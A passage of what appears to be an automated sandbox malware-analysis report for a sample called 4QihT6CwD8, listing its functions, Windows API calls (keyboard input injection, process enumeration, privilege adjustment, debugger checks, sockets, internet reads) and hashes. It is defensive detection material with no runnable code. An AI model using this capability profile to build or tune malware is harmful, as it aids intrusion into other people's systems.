                                  • Opcode ID: c4ce81283d028d70a142c25a7f52b40b31727a7a3fadf5c808a1f723b22a76d3
                                  • Instruction ID: 595d9fa830f844af5c68d4366b39d37790eed0d38b326c2a33b8fa68d7d1bb5e
                                  • Opcode Fuzzy Hash: c4ce81283d028d70a142c25a7f52b40b31727a7a3fadf5c808a1f723b22a76d3
                                  • Instruction Fuzzy Hash: D331E272504355AFCB22DF15D845F9BB7ADFF84314F000A1AF9959B281DB34EA09CB92
                                  Function 003C9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003C9B78
                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003C9C8B
                                    • Part of subcall function 003C3874: GetInputState.USER32 ref: 003C38CB
                                    • Part of subcall function 003C3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003C3966
                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003C9BA8
                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003C9C75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                  • String ID: *.*
                                  • API String ID: 1972594611-438819550
                                  • Opcode ID: 5c4693598680bf89299ca2d0c422996fad91c2a28bd686166f6d35744f469e29
                                  • Instruction ID: 69bafd8cba7e8b08f378cb5ac78373f27168bfdadae8af03f5e0f5ca73cd6f8c
                                  • Opcode Fuzzy Hash: 5c4693598680bf89299ca2d0c422996fad91c2a28bd686166f6d35744f469e29
                                  • Instruction Fuzzy Hash: 8541817190420AAFCF16DF64C889FEE7BB8EF05301F21815AE805E6191DB319E45CF60
                                  Function 0036997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00369BB2
                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00369A4E
                                  • GetSysColor.USER32(0000000F), ref: 00369B23
                                  • SetBkColor.GDI32(?,00000000), ref: 00369B36
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Color$LongProcWindow
                                  • String ID:
                                  • API String ID: 3131106179-0
                                  • Opcode ID: df6e2e5ab86f3269021ac99bee1ff0e961f7513736cccc26fdbc8a939de0155a
                                  • Instruction ID: 625a709666f0b689ab8592a16d1526778f42395c7c5d8e5448180c654cff86d0
                                  • Opcode Fuzzy Hash: df6e2e5ab86f3269021ac99bee1ff0e961f7513736cccc26fdbc8a939de0155a
                                  • Instruction Fuzzy Hash: FBA1F970208454AEE727AA6DCCD8F7B26DDDB43340F16821BF502DAAE9CA369D01C775
                                  Function 003D1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003D307A
                                    • Part of subcall function 003D304E: _wcslen.LIBCMT ref: 003D309B
                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003D185D
                                  • WSAGetLastError.WSOCK32 ref: 003D1884
                                  • bind.WSOCK32(00000000,?,00000010), ref: 003D18DB
                                  • WSAGetLastError.WSOCK32 ref: 003D18E6
                                  • closesocket.WSOCK32(00000000), ref: 003D1915
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                  • String ID:
                                  • API String ID: 1601658205-0
                                  • Opcode ID: c8366cef14402c6adbd523c51db4b7185c726d98a2bad21117c835028f050edf
                                  • Instruction ID: 22ed4911507ee3748d091950fe12395886a4b4d7fcbadb9cbbb451d2052fe8a2
                                  • Opcode Fuzzy Hash: c8366cef14402c6adbd523c51db4b7185c726d98a2bad21117c835028f050edf
                                  • Instruction Fuzzy Hash: 5E51A071A00200AFDB22EF24D886F2A77A5AB44718F088458F9065F3D3DB71AD428BA1
                                  Function 00358060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                  • API String ID: 0-1546025612
                                  • Opcode ID: 2b8b5d9fdea8d1efd2fabafc03ad592add4618b9bfe993ff8ec847ae135c8b88
                                  • Instruction ID: 6b80897a31ef35598086766def96a9677c4aee3a051983c374a3e6fa4fc23568
                                  • Opcode Fuzzy Hash: 2b8b5d9fdea8d1efd2fabafc03ad592add4618b9bfe993ff8ec847ae135c8b88
                                  • Instruction Fuzzy Hash: 1BA2A074E0161ACBDF26CF58C881BADB7B1BF44311F2585AADC15A7690EB309D85CF90
                                  Function 003B8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003B82AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: ($tbA$|
                                  • API String ID: 1659193697-3112021348
                                  • Opcode ID: 66f09742836290721ce93d714e322439ca3acfb5a0ab0e90375fd25d740f07dd
                                  • Instruction ID: 486fefe00c711361a382155b776b356244e7cd598c1b839d49b117891014496d
                                  • Opcode Fuzzy Hash: 66f09742836290721ce93d714e322439ca3acfb5a0ab0e90375fd25d740f07dd
                                  • Instruction Fuzzy Hash: D5323678A00605DFCB29CF19C081AAAB7F4FF48714B15C56EE59ADB7A1EB70E941CB40
                                  Function 003DA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 003DA6AC
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 003DA6BA
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • Process32NextW.KERNEL32(00000000,?), ref: 003DA79C
                                  • CloseHandle.KERNEL32(00000000), ref: 003DA7AB
                                    • Part of subcall function 0036CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00393303,?), ref: 0036CE8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                  • String ID:
                                  • API String ID: 1991900642-0
                                  • Opcode ID: 66860f3773c9232896d4405fa246f9ba67766f97e0f8df8e912d905d7fb464f1
                                  • Instruction ID: 032c6dcf2a8e37704d0b2193e38497d5c98ba7207daa9e6db0b5c728c9b39dc4
                                  • Opcode Fuzzy Hash: 66860f3773c9232896d4405fa246f9ba67766f97e0f8df8e912d905d7fb464f1
                                  • Instruction Fuzzy Hash: BE5130755083409FD711DF24D886E6BBBE8FF89754F40491DF9859B262EB30D908CB92
                                  Function 003BAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 003BAAAC
                                  • SetKeyboardState.USER32(00000080), ref: 003BAAC8
                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 003BAB36
                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 003BAB88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: KeyboardState$InputMessagePostSend
                                  • String ID:
                                  • API String ID: 432972143-0
                                  • Opcode ID: 4b0f443adc7bba67a2000cd52fdebf6783f87e3623c7bcf46323eba8e267c6d6
                                  • Instruction ID: 83c89dbdcc29c1d145b04152d818dedd31c32f876b1b488dfe0370bfe81eae01
                                  • Opcode Fuzzy Hash: 4b0f443adc7bba67a2000cd52fdebf6783f87e3623c7bcf46323eba8e267c6d6
                                  • Instruction Fuzzy Hash: E2311C30A50E48AEFF37CB648C05BFE7BAAAB44314F04421AF6A1569D0D3758985C762
                                  Function 0038BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 0038BB7F
                                    • Part of subcall function 003829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000), ref: 003829DE
                                    • Part of subcall function 003829C8: GetLastError.KERNEL32(00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000,00000000), ref: 003829F0
                                  • GetTimeZoneInformation.KERNEL32 ref: 0038BB91
                                  • WideCharToMultiByte.KERNEL32(00000000,?,0042121C,000000FF,?,0000003F,?,?), ref: 0038BC09
                                  • WideCharToMultiByte.KERNEL32(00000000,?,00421270,000000FF,?,0000003F,?,?,?,0042121C,000000FF,?,0000003F,?,?), ref: 0038BC36
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                  • String ID:
                                  • API String ID: 806657224-0
                                  • Opcode ID: e6e9b88450bff1ea298492fb47b779aa6f4ba720c6e18fd24e243fc59a59ce90
                                  • Instruction ID: 26c310f9f0445cf65a60984a36caf4d0ef8654d1b9927e16ce609fb66dd95475
                                  • Opcode Fuzzy Hash: e6e9b88450bff1ea298492fb47b779aa6f4ba720c6e18fd24e243fc59a59ce90
                                  • Instruction Fuzzy Hash: DF319070A04346DFCB26EF699C80929FBB8BF6535075542EAE061EB2B1D7309A41CB64
                                  Function 003CCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 003CCE89
                                  • GetLastError.KERNEL32(?,00000000), ref: 003CCEEA
                                  • SetEvent.KERNEL32(?,?,00000000), ref: 003CCEFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorEventFileInternetLastRead
                                  • String ID:
                                  • API String ID: 234945975-0
                                  • Opcode ID: 693f9bf67134a1afc602bf7cab6b937e934d8dc35b2c288ac654f4709575f19d
                                  • Instruction ID: d00d9e7fcbf64fdb489cef169683244d47ba74fe856d92d3ef07318594da7f9d
                                  • Opcode Fuzzy Hash: 693f9bf67134a1afc602bf7cab6b937e934d8dc35b2c288ac654f4709575f19d
                                  • Instruction Fuzzy Hash: 6121ED719103059BDB32CFA5C988FAA77FCEB01315F10941EE64AD6151E734EE058B54
                                  Function 00382622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0038271A
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00382724
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00382731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 663799a39473d0e2f688ef9e1d4a4670b036302145f3b2bbf460bb19176c5474
                                  • Instruction ID: 79e3621f4738f20629aabbd2dc02ead084eb4e83ab9692dc2cc6f7485926fc75
                                  • Opcode Fuzzy Hash: 663799a39473d0e2f688ef9e1d4a4670b036302145f3b2bbf460bb19176c5474
                                  • Instruction Fuzzy Hash: B131B7749113189BCB22DF64DC897DDB7B8AF08310F5081EAE41CAB261E7749F818F45
                                  Function 003C51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 003C51DA
                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003C5238
                                  • SetErrorMode.KERNEL32(00000000), ref: 003C52A1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DiskFreeSpace
                                  • String ID:
                                  • API String ID: 1682464887-0
                                  • Opcode ID: f15002b67ebf89c0fc039e4d60c50b77ee013625865a7a0e9ad4f8e4d6d83e36
                                  • Instruction ID: bfb467763fd84e2925ff678c353e217dcc07b5464c7f47d25bcfc6fe272cea6f
                                  • Opcode Fuzzy Hash: f15002b67ebf89c0fc039e4d60c50b77ee013625865a7a0e9ad4f8e4d6d83e36
                                  • Instruction Fuzzy Hash: 1D312975A106189FDB01DF54D884EADBBB4FF49318F058499E805AF2A2DB31E85ACB90
                                  Function 003B16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0036FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00370668
                                    • Part of subcall function 0036FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00370685
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B170D
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B173A
                                  • GetLastError.KERNEL32 ref: 003B174A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                  • String ID:
                                  • API String ID: 577356006-0
                                  • Opcode ID: a87d7f87dc59289e1164b2122b217c3d9ed5cc0eecc263d2b221de1e57929a5e
                                  • Instruction ID: d012e9211cb3f6d27538fe608bf98f63a6a1c194c58e5618719ad545517d1560
                                  • Opcode Fuzzy Hash: a87d7f87dc59289e1164b2122b217c3d9ed5cc0eecc263d2b221de1e57929a5e
                                  • Instruction Fuzzy Hash: 5211BFB2410204AFD7299F54ECC6DAAB7BDEB05714B20852EE45657685EB70FC428B60
                                  Function 003BD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003BD608
                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003BD645
                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003BD650
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseControlCreateDeviceFileHandle
                                  • String ID:
                                  • API String ID: 33631002-0
                                  • Opcode ID: 46384f8fcc04f54f6e231bf61c95dcd618f56d9c198b27027e38b3f538f48617
                                  • Instruction ID: e8ffa5beba7862a17b1a7417ca7c87b0344a441bc21bd0dbbcbff5f74fd70a5c
                                  • Opcode Fuzzy Hash: 46384f8fcc04f54f6e231bf61c95dcd618f56d9c198b27027e38b3f538f48617
                                  • Instruction Fuzzy Hash: 21113C75E05228BBDB218F959C85FEFBFBCEB45B50F108115F904E7290D6704A058BA1
                                  Function 003B1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003B168C
                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003B16A1
                                  • FreeSid.ADVAPI32(?), ref: 003B16B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
